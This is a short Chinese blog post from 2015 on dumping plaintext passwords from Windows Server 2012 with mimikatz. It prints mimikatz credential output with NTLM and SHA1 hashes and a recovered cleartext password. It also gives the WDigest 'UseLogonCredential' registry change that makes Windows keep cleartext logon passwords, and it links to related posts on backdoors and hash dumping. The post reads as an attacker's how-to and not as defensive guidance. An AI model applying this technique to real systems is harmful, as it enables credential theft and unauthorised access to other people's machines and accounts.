windows 2012 抓明文密码方法

mickey | 2015-05-11 11:52

默认配置是抓不到明文密码了,神器mimikatz显示Password为null

Authentication Id : 0 ; 121279 (00000000:0001d9bf)
Session           : Interactive from 1
User Name         : mickey
Domain            : WIN-B054LAOH5FC
Logon Server      : WIN-B054LAOH5FC
Logon Time        : 2014/2/7 16:13:37
SID               : S-1-5-21-3697557613-2315859964-140861748-1001
        msv :
         [00000003] Primary
         * Username : mickey
         * Domain   : WIN-B054LAOH5FC
         * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
         * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
         [00010000] CredentialKeys
         * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
         * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
        tspkg :
        wdigest :
         * Username : mickey
         * Domain   : WIN-B054LAOH5FC
         * Password : (null)
        kerberos :
         * Username : mickey
         * Domain   : WIN-B054LAOH5FC
         * Password : (null)
        ssp :   KO
        credman :

需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用户再登录,就能记录到明文密码了。

Authentication Id : 0 ; 2506062 (00000000:00263d4e)
Session           : Interactive from 2
User Name         : mickey
Domain            : WIN-B054LAOH5FC
Logon Server      : WIN-B054LAOH5FC
Logon Time        : 2015/5/11 11:47:35
SID               : S-1-5-21-3697557613-2315859964-140861748-1001
        msv :
         [00010000] CredentialKeys
         * NTLM     : ad12521316a18d2172f20db07674c278
         * SHA1     : 85b6b322a966fe19f758ee15fd7516c23c33cb7c
         [00000003] Primary
         * Username : mickey
         * Domain   : WIN-B054LAOH5FC
         * NTLM     : ad12521316a18d2172f20db07674c278
         * SHA1     : 85b6b322a966fe19f758ee15fd7516c23c33cb7c
        tspkg :
        wdigest :
         * Username : mickey
         * Domain   : WIN-B054LAOH5FC
         * Password : AGeisNBVeryNB@wooyun.org

参考链接:http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html

[原文地址]

相关内容:

某款网络摄像机直接获取帐号密码,视频监控设备配置信息泄露漏洞

超贱!抓鸡盗号黑客修改用户电脑系统登录账户密码,留下QQ号索要赎金敲诈!

QuarksPwDum导出2003 AD域控所有用户hash的方法

如何设置安全的密码

户外物理设备入侵之:入侵并“调教”中控指纹语音考勤系统(打卡机)

服务器被入侵之后,反爆1433抓鸡黑客菊花,并公布大量黑阔账号密码

如何在服务器留下长期隐蔽性后门

Windows server 2012 用户hash抓取方法研究(本地+域)

轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码!

【转载】Windows 系统密码破解全攻略

留言评论(旧系统):

佚名 @ 2015-07-07 20:33:07

学习了!

本站回复:

+1